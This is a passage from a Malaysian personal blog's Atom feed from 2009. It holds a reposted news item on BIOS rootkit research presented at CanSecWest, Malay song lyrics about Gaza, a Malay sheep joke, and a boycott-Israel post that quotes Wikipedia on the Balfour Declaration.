onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://1.bp.blogspot.com/_zPPJaS3LoQM/ScpB7rnahrI/AAAAAAAAAnI/4IPmn6YSQOw/s1600-h/Cansecwest+001-ortega.jpg"&gt;&lt;img style="margin: 0pt 10px 10px 0pt; float: left; cursor: pointer; width: 200px; height: 116px;" src="http://1.bp.blogspot.com/_zPPJaS3LoQM/ScpB7rnahrI/AAAAAAAAAnI/4IPmn6YSQOw/s200/Cansecwest+001-ortega.jpg" alt="" id="BLOGGER_PHOTO_ID_5317134803640420018" border="0" /&gt;&lt;/a&gt;Apply all of the browser, application and OS patches you want, your machine still can be completely and silently compromised at the lowest level--without the use of any vulnerability. &lt;p&gt;That was the rather sobering message delivered by a pair of security researchers from Core Security Technologies in a talk at the CanSecWest conference on methods for infecting the BIOS with persistent code that will survive reboots and reflashing attempts. Anibal Sacco and Alfredo Ortega (above) demonstrated a method for patching the BIOS with a small bit of code that gave them conplete control of the machine. And the best part is, the method worked on a Windows machine, a PC running OpenBSD and another running VMware Player. &lt;/p&gt; &lt;p&gt;"It was very easy. We can put the code wherever we want," said Ortega. "We're not using a vulnerability in any way. I'm not sure if you understand the impact of this. We can reinfect the BIOS every time it reboots."&lt;/p&gt; &lt;p&gt;Sacco and Ortega stressed that in order to execute the attacks, you need either root privileges or physical access to the machine in question, which limits the scope. But the methods are deadly effective and the pair are currently working on a BIOS rootkit to implement the attack. &lt;/p&gt; &lt;p&gt;"We can patch a driver to drop a fully working rootkit. We even have a little code that can remove or disable antivirus," Ortega said.&lt;/p&gt; &lt;p&gt;The work by the Core team follows on to research done on &lt;a href="http://searchsecurity.techtarget.com/news/column/0,294698,sid14_gci1246533,00.html"&gt;persistent rootkits by John Heasman of NGSS&lt;/a&gt;, who was able to devise a method for placing rootkits on PCs using the memory space on PCI cards. In a presentation at Black Hat DC in 2007, Heasman showed a completely working method for loading the malware on to a PCI card by using the flashable ROM on the device. He also had a way to bypass the Windows NT kernel and create fake stack pointers.&lt;/p&gt; &lt;p&gt;In an interview at the time, he told me: "At that point it's game over. We're executing 32-bit code in ring zero."&lt;/p&gt; &lt;p&gt;As application and operating system protection mechanisms continue to become more sophisticated and more difficult to evade, expect to see more and more attacks targeting the hardware and low-level software, where there are still opportunities for success.&lt;/p&gt;&lt;p&gt;source: &lt;a href="http://threatpost.com/blogs/researchers-unveil-persistent-bios-attack-methods"&gt;threatpost blogs&lt;/a&gt;&lt;br /&gt;&lt;/p&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7306732139129025494-1928087479101437349?l=shaolininteger.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://shaolininteger.blogspot.com/feeds/1928087479101437349/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=7306732139129025494&amp;postID=1928087479101437349' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7306732139129025494/posts/default/1928087479101437349'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7306732139129025494/posts/default/1928087479101437349'/><link rel='alternate' type='text/html' href='http://shaolininteger.blogspot.com/2009/03/researchers-unveil-persistent-bios.html' title='Researchers unveil persistent BIOS attack methods'/><author><name>Slash The Underground</name><uri>http://www.blogger.com/profile/11809812496786804883</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://1.bp.blogspot.com/_zPPJaS3LoQM/SYlLqQUM6OI/AAAAAAAAAlo/gG3dNEYX_Dc/S220/17012009021.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://1.bp.blogspot.com/_zPPJaS3LoQM/ScpB7rnahrI/AAAAAAAAAnI/4IPmn6YSQOw/s72-c/Cansecwest+001-ortega.jpg' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7306732139129025494.post-6441020330233424962</id><published>2009-02-06T00:39:00.002+08:00</published><updated>2009-02-06T00:44:38.645+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='News'/><category scheme='http://www.blogger.com/atom/ns#' term='LostSoul'/><title type='text'>Save Palestine</title><content type='html'>&lt;object width="425" height="344"&gt;&lt;br /&gt;&lt;param name="movie" value="http://www.youtube.com/v/_uoO66cowUo&amp;amp;hl=en&amp;amp;autoplay=1&amp;amp;fs=1"&gt;&lt;param name="allowFullScreen" value="true"&gt;&lt;param name="allowscriptaccess" value="always"&gt;&lt;embed src="http://www.youtube.com/v/_uoO66cowUo&amp;amp;hl=en&amp;amp;autoplay=1&amp;amp;fs=1" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" width="425" height="344"&gt;&lt;/embed&gt;&lt;/object&gt;&lt;br /&gt;Maghrib Khamis dibasuhnya baju&lt;br /&gt;ampaian di luar jendela&lt;br /&gt;Berinjak kakinya doakan rambulan&lt;br /&gt;keringkan jemuran&lt;br /&gt;Rindu hanya satu&lt;br /&gt;esok solat jumaat&lt;br /&gt;ingin doa mengadu diri yatim piatu&lt;br /&gt;&lt;br /&gt;Ooo&lt;br /&gt;&lt;br /&gt;Malam pun larut&lt;br /&gt;Khan Younis terlena di pintu&lt;br /&gt;&lt;br /&gt;Wooo&lt;br /&gt;&lt;br /&gt;belum pun subuh&lt;br /&gt;api menyambar&lt;br /&gt;lebur kaca jendela&lt;br /&gt;maut menceroboh&lt;br /&gt;mayat masih di situ&lt;br /&gt;jari merah kecil&lt;br /&gt;erat menggenggam baju basah&lt;br /&gt;airnya mandikan Gaza..&lt;br /&gt;&lt;br /&gt;erat menggenggam baju basah&lt;br /&gt;airnya mandikan Gaza...&lt;br /&gt;&lt;br /&gt;Khan Younis&lt;br /&gt;doamu tulus oooh&lt;br /&gt;Khan Younis!&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7306732139129025494-6441020330233424962?l=shaolininteger.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://shaolininteger.blogspot.com/feeds/6441020330233424962/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=7306732139129025494&amp;postID=6441020330233424962' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7306732139129025494/posts/default/6441020330233424962'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7306732139129025494/posts/default/6441020330233424962'/><link rel='alternate' type='text/html' href='http://shaolininteger.blogspot.com/2009/02/save.html' title='Save Palestine'/><author><name>Slash The Underground</name><uri>http://www.blogger.com/profile/11809812496786804883</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://1.bp.blogspot.com/_zPPJaS3LoQM/SYlLqQUM6OI/AAAAAAAAAlo/gG3dNEYX_Dc/S220/17012009021.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7306732139129025494.post-7446854516164132124</id><published>2009-02-03T21:44:00.002+08:00</published><updated>2009-02-03T21:51:53.352+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Penglipur Lara'/><title type='text'>Apa bezanya, pacik..</title><content type='html'>&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://3.bp.blogspot.com/_zPPJaS3LoQM/SYhL8JFQMPI/AAAAAAAAAlg/qCZutz5NtvQ/s1600-h/black_and_white_sheep-600.jpg"&gt;&lt;img style="margin: 0pt 10px 10px 0pt; float: left; cursor: pointer; width: 200px; height: 161px;" src="http://3.bp.blogspot.com/_zPPJaS3LoQM/SYhL8JFQMPI/AAAAAAAAAlg/qCZutz5NtvQ/s200/black_and_white_sheep-600.jpg" alt="" id="BLOGGER_PHOTO_ID_5298568458203574514" border="0" /&gt;&lt;/a&gt;Pemuda :Baguslah ternakan biri-biri pakcik ni. Boleh saya tanya beberapa soalan tak?&lt;br /&gt;Pakcik   :Boleh aje..&lt;br /&gt;Pemuda :Berapa jauh biri-biri ni berjalan setiap hari?&lt;br /&gt;Pakcik   :Yang mana,yang putih atau yang hitam?&lt;br /&gt;Pemuda :Yang putih.&lt;br /&gt;Pakcik   :Kalau yang putih berjalan lebih kurang enam kilometer setiap hari.&lt;br /&gt;Pemuda :Yang hitam?&lt;br /&gt;Pakcik   :Yang hitam pun sama.&lt;br /&gt;Pemuda :Berapa banyak pulak rumput biri-biri ni makan setiap hari?&lt;br /&gt;Pakcik   :Yang mana, yang putih atau yang hitam?&lt;br /&gt;Pemuda :Yang putih?&lt;br /&gt;Pakcik   :Ermm, yang putih makan lebih kurang empat kilo rumput setiap hari.&lt;br /&gt;Pemuda :Dan yang hitam?&lt;br /&gt;Pakcik   :Yang hitam pun sama.&lt;br /&gt;Pemuda :Berapa banyak bulu yang mereka hasilkan setiap tahun?&lt;br /&gt;Pakcik   :Yang mana, yang putih atau yang hitam?&lt;br /&gt;Pemuda :Yang putih?&lt;br /&gt;Pakcik   :Aaa..yang putih menghasilkan sekitar enam kilo bulu setiap tahun.&lt;br /&gt;Pemuda :Dan yang hitam?&lt;br /&gt;Pakcik   :Yang hitam pun sama.&lt;br /&gt;Pemuda :Kenapa pakcik membezakan biri-biri pakcik yg putih dgn yg hitam,padahal jawapan semuanya sama aje?&lt;br /&gt;Pakcik   :Mestilah..sebab biri-biri yang putih itu pakcik yang punye.&lt;br /&gt;Pemuda :Ooo, gitu ke..abis tu yang hitam tu sapa punye?&lt;br /&gt;Pakcik   :Yang hitam pun sama.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7306732139129025494-7446854516164132124?l=shaolininteger.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://shaolininteger.blogspot.com/feeds/7446854516164132124/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=7306732139129025494&amp;postID=7446854516164132124' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7306732139129025494/posts/default/7446854516164132124'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7306732139129025494/posts/default/7446854516164132124'/><link rel='alternate' type='text/html' href='http://shaolininteger.blogspot.com/2009/02/apa-bezanya-pacik.html' title='Apa bezanya, pacik..'/><author><name>Slash The Underground</name><uri>http://www.blogger.com/profile/11809812496786804883</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://1.bp.blogspot.com/_zPPJaS3LoQM/SYlLqQUM6OI/AAAAAAAAAlo/gG3dNEYX_Dc/S220/17012009021.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://3.bp.blogspot.com/_zPPJaS3LoQM/SYhL8JFQMPI/AAAAAAAAAlg/qCZutz5NtvQ/s72-c/black_and_white_sheep-600.jpg' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7306732139129025494.post-4147650901429899401</id><published>2009-01-16T12:24:00.022+08:00</published><updated>2009-01-16T15:55:44.381+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='News'/><title type='text'>Boycott Israel Campaign</title><content type='html'>&lt;a style="" onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://3.bp.blogspot.com/_zPPJaS3LoQM/SXA3OieGIqI/AAAAAAAAAkw/E7s_O_uN5ZM/s1600-h/boycott-israel-275x275.gif"&gt;&lt;img style="margin: 0pt 10px 10px 0pt; float: left; cursor: pointer; width: 200px; height: 150px;" src="http://3.bp.blogspot.com/_zPPJaS3LoQM/SXA3OieGIqI/AAAAAAAAAkw/E7s_O_uN5ZM/s200/boycott-israel-275x275.gif" alt="" id="BLOGGER_PHOTO_ID_5291790285071065762" border="0" /&gt;&lt;/a&gt;Before we go further, I would like to take everyone to read following articles so you aware of  history of Palestine and Israel, thus why I write this blog.&lt;br /&gt;&lt;br /&gt;The &lt;b&gt;Balfour Declaration of 1917&lt;/b&gt; (dated 2 November 1917) was a &lt;a href="http://en.wikipedia.org/wiki/Classified" title="Classified"&gt;classified&lt;/a&gt; formal statement of &lt;a href="http://en.wikipedia.org/wiki/Policy" title="Policy"&gt;policy&lt;/a&gt; by the &lt;a href="http://en.wikipedia.org/wiki/United_Kingdom_of_Great_Britain_and_Ireland" title="United Kingdom of Great Britain and Ireland"&gt;British&lt;/a&gt; government stating that the British government "view with favour the establishment in Palestine of a national home for the Jewish people &lt;span&gt;"with the understanding that "nothing shall be done which may prejudice the civil and religious rights of existing non-Jewish communities in Palestine, or the rights and political status enjoyed by Jews in any other country."&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;The declaration was made in a letter from &lt;a href="http://en.wikipedia.org/wiki/Secretary_of_State_for_Foreign_Affairs" title="Secretary of State for Foreign Affairs" class="mw-redirect"&gt;Foreign Secretary&lt;/a&gt; &lt;a href="http://en.wikipedia.org/wiki/Arthur_James_Balfour" title="Arthur James Balfour" class="mw-redirect"&gt;Arthur James Balfour&lt;/a&gt; to &lt;a href="http://en.wikipedia.org/wiki/Walter_Rothschild,_2nd_Baron_Rothschild" title="Walter Rothschild, 2nd Baron Rothschild"&gt;Lord Rothschild&lt;/a&gt; (Walter Rothschild, 2nd Baron Rothschild), a leader of the British Jewish community, for transmission to the &lt;a href="http://en.wikipedia.org/wiki/Zionist_Federation_of_Great_Britain_and_Ireland" title="Zionist Federation of Great Britain and Ireland"&gt;Zionist Federation&lt;/a&gt;, a private Zionist organization. The letter reflected the position of the &lt;a href="http://en.wikipedia.org/wiki/British_Cabinet" title="British Cabinet" class="mw-redirect"&gt;British Cabinet&lt;/a&gt;, as agreed upon in a meeting on 31 October 1917. It further stated that the declaration is a sign of "sympathy with Jewish Zionist aspirations."&lt;br /&gt;&lt;br /&gt;The statement was issued through the efforts of &lt;a href="http://en.wikipedia.org/wiki/Chaim_Weizmann" title="Chaim Weizmann"&gt;Chaim Weizmann&lt;/a&gt; and &lt;a href="http://en.wikipedia.org/wiki/Nahum_Sokolow" title="Nahum Sokolow"&gt;Nahum Sokolow&lt;/a&gt;, the principal Zionist leaders based in London but, as they had asked for the reconstitution of &lt;a href="http://en.wikipedia.org/wiki/Palestine" title="Palestine"&gt;Palestine&lt;/a&gt; as “the” &lt;a href="http://en.wikipedia.org/wiki/Jewish" title="Jewish" class="mw-redirect"&gt;Jewish&lt;/a&gt; national home, the Declaration fell short of Zionist expectations.&lt;br /&gt;&lt;br /&gt;The "Balfour Declaration" was later incorporated into the &lt;a href="http://en.wikipedia.org/wiki/Treaty_of_S%C3%A8vres" title="Treaty of Sèvres"&gt;Sèvres peace treaty&lt;/a&gt; with &lt;a href="http://en.wikipedia.org/wiki/Turkey" title="Turkey"&gt;Turkey&lt;/a&gt; and the &lt;a href="http://en.wikipedia.org/wiki/British_Mandate_of_Palestine" title="British Mandate of Palestine"&gt;Mandate for Palestine&lt;/a&gt;. The original document is kept at the &lt;a href="http://en.wikipedia.org/wiki/British_Library" title="British Library"&gt;British Library&lt;/a&gt;.&lt;br /&gt;&lt;br /&gt;&lt;div style="border: 1px solid black; padding: 1em; font-style: italic;"&gt;&lt;b&gt;"Deklarasi Balfour&lt;/b&gt; (&lt;a href="http://id.wikipedia.org/wiki/1917" title="1917"&gt;1917&lt;/a&gt;) ialah surat yang bertarikh &lt;a href="http://id.wikipedia.org/wiki/2_November" title="2 November"&gt;2 November&lt;/a&gt; 1917 dari Menteri Luar Negeri Britain, &lt;span style="font-weight: bold;"&gt;Arthur James Balfour&lt;/span&gt; kepada &lt;span style="font-weight: bold;"&gt;Lord Rothschild&lt;/span&gt;, pemimpin komunitas Yahudi Inggris, untuk dikirimkan kepada Federasi Zionis. Surat itu menyatakan posisi yang disetujui pada rapat Kabinet Inggris pada 31 Oktober 1917, bahwa pemerintah Inggris mendukung rencana-rencana Zionis buat ‘tanah air’ bagi Yahudi di Palastin, dengan syarat bahwa tidak ada hal-hal yang boleh dilakukan yang mungkin merugikan hak-hak dari komuniti-komuniti yang ada di sana."&lt;/div&gt;&lt;br /&gt;&lt;span style="font-style: italic;"&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;Original Text Declaration of Balfour 1917&lt;/span&gt;:&lt;br /&gt;&lt;br /&gt;&lt;div style="border: 1px solid black; padding: 1em;"&gt;Foreign Office&lt;br /&gt;November 2nd, 1917&lt;br /&gt;&lt;br /&gt;Dear &lt;a href="http://www.blogger.com/w/index.php?title=Walter_Rothschild,_2nd_Baron_Rothschild&amp;amp;action=edit&amp;amp;redlink=1" class="new" title="Walter Rothschild, 2nd Baron Rothschild (belum dibuat)"&gt;Lord Rothschild&lt;/a&gt;,&lt;br /&gt;&lt;br /&gt;I have much pleasure in conveying to you, on behalf of His Majesty's Government, the following declaration of sympathy with Jewish Zionist aspirations which has been submitted to, and approved by, the Cabinet.&lt;br /&gt;&lt;br /&gt;"His Majesty's Government view with favour the establishment in Palestine of a national home for the Jewish people, and will use their best endeavours to facilitate the achievement of this object, it being clearly understood that nothing shall be done which may prejudice the civil and religious rights of existing non-Jewish communities in Palestine, or the rights and political status enjoyed by Jews in any other country."&lt;br /&gt;&lt;br /&gt;I should be grateful if you would bring this declaration to the knowledge of the Zionist Federation.&lt;br /&gt;&lt;br /&gt;Yours sincerely,&lt;br /&gt;&lt;a href="http://www.blogger.com/wiki/Arthur_Balfour" title="Arthur Balfour" class="mw-redirect"&gt;Arthur James Balfour&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;Bahasa Malaysia translation:&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-style: italic;"&gt;Departemen Luar Negeri&lt;br /&gt;2 November 1917&lt;/span&gt;&lt;span style="font-style: italic;"&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style="font-style: italic;"&gt;Lord Rothschild yang terhormat,&lt;/span&gt;&lt;span style="font-style: italic;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style="font-style: italic;"&gt;Saya sangat senang dalam menyampaikan kepada Anda, atas nama Pemerintahan Sri Baginda, pernyataan simpati terhadap aspirasi Zionis Yahudi yang telah diajukan kepada dan disetujui oleh Kabinet.&lt;/span&gt;&lt;span style="font-style: italic;"&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style="font-style: italic;"&gt;"Pemerintahan Sri Baginda memandang positif pendirian di Palestina tanah air untuk orang Yahudi, dan akan menggunakan usaha keras terbaik mereka untuk memudahkan tercapainya tujuan ini, karena jelas dipahami bahwa tidak ada suatupun yang boleh dilakukan yang dapat merugikan hak-hak penduduk dan keagamaan dari komunitas-komunitas non-Yahudi yang ada di Palestina, ataupun hak-hak dan status politis yang dimiliki orang Yahudi di negara-negara lainnya ."&lt;/span&gt;&lt;span style="font-style: italic;"&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style="font-style: italic;"&gt;Saya sangat berterima kasih jika Anda dapat menyampaikan deklarasi ini untuk diketahui oleh Federasi Zionis.&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-style: italic;"&gt;Yang Benar,&lt;/span&gt;&lt;br /&gt;&lt;span style="font-style: italic;"&gt;Arthur James Balfour&lt;/span&gt;&lt;br /&gt;&lt;/div&gt;&lt;a name="Terjemahan_dalam_bahasa_Indonesia" id="Terjemahan_dalam_bahasa_Indonesia"&gt;&lt;/a&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;Negotiation&lt;/span&gt;&lt;br /&gt;One of the main proponents of a Jewish homeland in Palestine was &lt;a href="http://en.wikipedia.org/wiki/Chaim_Weizmann" title="Chaim Weizmann"&gt;Dr. Chaim Weizmann&lt;/a&gt;, the leading spokesman for organized Zionism in Britain. Weizmann was a chemist who had developed a process to synthesize &lt;a href="http://en.wikipedia.org/wiki/Acetone" title="Acetone"&gt;acetone&lt;/a&gt; via &lt;a href="http://en.wikipedia.org/wiki/Fermentation_%28biochemistry%29" title="Fermentation (biochemistry)"&gt;fermentation&lt;/a&gt;. Acetone is required for the production of &lt;a href="http://en.wikipedia.org/wiki/Cordite" title="Cordite"&gt;cordite&lt;/a&gt;, a powerful &lt;a href="http://en.wikipedia.org/wiki/Propellant" title="Propellant"&gt;propellant&lt;/a&gt; explosive needed to fire ammunition without generating tell-tale smoke. Germany had cornered supplies of &lt;a href="http://en.wikipedia.org/wiki/Calcium_acetate" title="Calcium acetate"&gt;calcium acetate&lt;/a&gt;, a major source of acetone. Other pre-war processes in Britain were inadequate to meet the increased demand in &lt;a href="http://en.wikipedia.org/wiki/World_War_I" title="World War I"&gt;World War I&lt;/a&gt;, and a shortage of cordite would have severely hampered Britain's war effort. &lt;a href="http://en.wikipedia.org/wiki/David_Lloyd-George" title="David Lloyd-George" class="mw-redirect"&gt;Lloyd-George&lt;/a&gt;, then Minister for Munitions, was grateful to Weizmann and so supported his Zionist aspirations. In his &lt;i&gt;War Memoirs&lt;/i&gt;, Lloyd George wrote of meeting Weizmann in 1916 that Weizmann &lt;dl&gt;&lt;dd&gt;... explained his aspirations as to the repatriation of the Jews to the sacred land they had made famous. That was the fount and origin of the famous declaration about the National Home for the Jews in Palestine .... As soon as I became Prime Minister I talked the whole matter over with Mr Balfour, who was then Foreign Secretary.&lt;/dd&gt;&lt;/dl&gt;  &lt;p&gt;However, this version of the story of the declaration's origins has been described as "fanciful", a fair assessment considering that discussions between Weizmann and Balfour had begun at least a decade earlier. In late 1905 Balfour had requested of his Jewish constituency representative, Charles Dreyfus, that he arrange a meeting with Weizman, during which Weizman asked for official British support for Zionism, and they were to meet again on this issue in 1914.&lt;br /&gt;&lt;/p&gt;&lt;p&gt;During the first meeting between Weizmann and Balfour in 1906, Balfour asked what Weizmann's objections were to the idea of a Jewish homeland in Uganda rather than in Palestine. According to Weizmann's memoir, the conversation went as follows:&lt;/p&gt;&lt;div style="border: 1px solid black; padding: 1em;"&gt;"Mr. Balfour, supposing I was to offer you Paris instead of London, would you take it?" He sat up, looked at me, and answered: "But Dr. Weizmann, we have London." "That is true," I said, "but we had Jerusalem when London was a marsh." He ... said two things which I remember vividly. The first was: "Are there many Jews who think like you?" I answered: "I believe I speak the mind of millions of Jews whom you will never see and who cannot speak for themselves." ... To this he said: "If that is so you will one day be a force."&lt;sup id="cite_ref-11" class="reference"&gt;&lt;a href="http://en.wikipedia.org/wiki/Balfour_Declaration_of_1917#cite_note-11" title=""&gt;&lt;span&gt;&lt;/span&gt;&lt;span&gt;&lt;/span&gt;&lt;/a&gt;&lt;/sup&gt;&lt;/div&gt;&lt;br /&gt;&lt;span style="font-style: italic;"&gt;Weizmann ialah kimiawan yang berjaya mensintesiskan aseton melalui fermentasi. Aseton diperlukan dalam menghasilkan cordite, bahan pembakar yang diperlukan untuk mendorong peluru-peluru. Jerman memonopoli ramuan aseton kunci, kalsium asetat. Tanpa kalsium asetat, Britan tidak ada keupayan mencipta aseton dan tanpa aseton takkan ada cordite. Jadi, tanpa cordite, Inggris pada ketika itu mungkin akan kalah dalam Perang Besar. Ketika ditanya bayaran apa yang diinginkan, Weizmann menjawab, "&lt;/span&gt;&lt;span style="font-weight: bold; font-style: italic;"&gt;Hanya ada satu hal yang saya inginkan. Tanah air buat orang-orang saya."&lt;/span&gt;&lt;span style="font-style: italic;"&gt; Ia menerima pembayaran untuk penemuan ini dan peran dalam sejarah awal Israel.&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;I would like to call all Muslims around the globe to join &lt;span style="font-weight: bold;"&gt;Boycott Israel Campaign&lt;/span&gt; to show their protest against Israel Acts in Palestine. The following brands are mandatory and vital to be boycotted at any reasons.&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://4.bp.blogspot.com/_zPPJaS3LoQM/SXA06ZAsz9I/AAAAAAAAAjg/cpsE-gt7f9c/s1600-h/Johnson.gif"&gt;&lt;img style="cursor: pointer; width: 200px; height: 41px;" src="http://4.bp.blogspot.com/_zPPJaS3LoQM/SXA06ZAsz9I/AAAAAAAAAjg/cpsE-gt7f9c/s200/Johnson.gif" alt="" id="BLOGGER_PHOTO_ID_5291787739911213010" border="0" /&gt;&lt;/a&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://3.bp.blogspot.com/_zPPJaS3LoQM/SXA2WB4MC-I/AAAAAAAAAkg/A_MlZroyZAU/s1600-h/loreal.gif"&gt;&lt;img style="cursor: pointer; width: 200px; height: 41px;" src="http://3.bp.blogspot.com/_zPPJaS3LoQM/SXA2WB4MC-I/AAAAAAAAAkg/A_MlZroyZAU/s200/loreal.gif" alt="" id="BLOGGER_PHOTO_ID_5291789314249460706" border="0" /&gt;&lt;/a&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://3.bp.blogspot.com/_zPPJaS3LoQM/SXA1iEggHqI/AAAAAAAAAkY/sRxloWpcL7I/s1600-h/timberland.gif"&gt;&lt;img style="cursor: pointer; width: 200px; height: 41px;" src="http://3.bp.blogspot.com/_zPPJaS3LoQM/SXA1iEggHqI/AAAAAAAAAkY/sRxloWpcL7I/s200/timberland.gif" alt="" id="BLOGGER_PHOTO_ID_5291788421602221730" border="0" /&gt;&lt;/a&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://3.bp.blogspot.com/_zPPJaS3LoQM/SXA1PPwITLI/AAAAAAAAAjo/u8t8MtQWSO4/s1600-h/kimberly.jpg"&gt;&lt;img style="cursor: pointer; width: 200px; height: 41px;" src="http://3.bp.blogspot.com/_zPPJaS3LoQM/SXA1PPwITLI/AAAAAAAAAjo/u8t8MtQWSO4/s200/kimberly.jpg" alt="" id="BLOGGER_PHOTO_ID_5291788098203045042" border="0" /&gt;&lt;/a&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://1.bp.blogspot.com/_zPPJaS3LoQM/SXA06LqGDaI/AAAAAAAAAjQ/HMkstGtq3qE/s1600-h/ibm.gif"&gt;&lt;img style="cursor: pointer; width: 200px; height: 41px;" src="http://1.bp.blogspot.com/_zPPJaS3LoQM/SXA06LqGDaI/AAAAAAAAAjQ/HMkstGtq3qE/s200/ibm.gif" alt="" id="BLOGGER_PHOTO_ID_5291787736326737314" border="0" /&gt;&lt;/a&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://1.bp.blogspot.com/_zPPJaS3LoQM/SXA1PoNElsI/AAAAAAAAAkI/RWwk5K8fHqY/s1600-h/saralee.gif"&gt;&lt;img style="cursor: pointer; width: 200px; height: 41px;" src="http://1.bp.blogspot.com/_zPPJaS3LoQM/SXA1PoNElsI/AAAAAAAAAkI/RWwk5K8fHqY/s200/saralee.gif" alt="" id="BLOGGER_PHOTO_ID_5291788104766887618" border="0" /&gt;&lt;/a&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://2.bp.blogspot.com/_zPPJaS3LoQM/SXA1PSiKZWI/AAAAAAAAAkA/FYANu8cwv7k/s1600-h/nokia.gif"&gt;&lt;img style="cursor: pointer; width: 200px; height: 41px;" src="http://2.bp.blogspot.com/_zPPJaS3LoQM/SXA1PSiKZWI/AAAAAAAAAkA/FYANu8cwv7k/s200/nokia.gif" alt="" id="BLOGGER_PHOTO_ID_5291788098949768546" border="0" /&gt;&lt;/a&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://1.bp.blogspot.com/_zPPJaS3LoQM/SXA1PbStr4I/AAAAAAAAAj4/njk0pB6kzSA/s1600-h/nestle_banner.gif"&gt;&lt;img style="cursor: pointer; width: 200px; height: 41px;" src="http://1.bp.blogspot.com/_zPPJaS3LoQM/SXA1PbStr4I/AAAAAAAAAj4/njk0pB6kzSA/s200/nestle_banner.gif" alt="" id="BLOGGER_PHOTO_ID_5291788101300891522" border="0" /&gt;&lt;/a&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://2.bp.blogspot.com/_zPPJaS3LoQM/SXA1PU8aUXI/AAAAAAAAAjw/iLxJqpcyR0A/s1600-h/mac.gif"&gt;&lt;img style="cursor: pointer; width: 200px; height: 41px;" src="http://2.bp.blogspot.com/_zPPJaS3LoQM/SXA1PU8aUXI/AAAAAAAAAjw/iLxJqpcyR0A/s200/mac.gif" alt="" id="BLOGGER_PHOTO_ID_5291788099596734834" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://4.bp.blogspot.com/_zPPJaS3LoQM/SXA06MtZpsI/AAAAAAAAAjY/bCy3vbOTnQw/s1600-h/intel.gif"&gt;&lt;img style="cursor: pointer; width: 200px; height: 41px;" src="http://4.bp.blogspot.com/_zPPJaS3LoQM/SXA06MtZpsI/AAAAAAAAAjY/bCy3vbOTnQw/s200/intel.gif" alt="" id="BLOGGER_PHOTO_ID_5291787736609040066" border="0" /&gt;&lt;/a&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://3.bp.blogspot.com/_zPPJaS3LoQM/SXA5ry-FAzI/AAAAAAAAAlQ/L0C-anNc1v4/s1600-h/m+and+s.jpg"&gt;&lt;img style="cursor: pointer; width: 200px; height: 41px;" 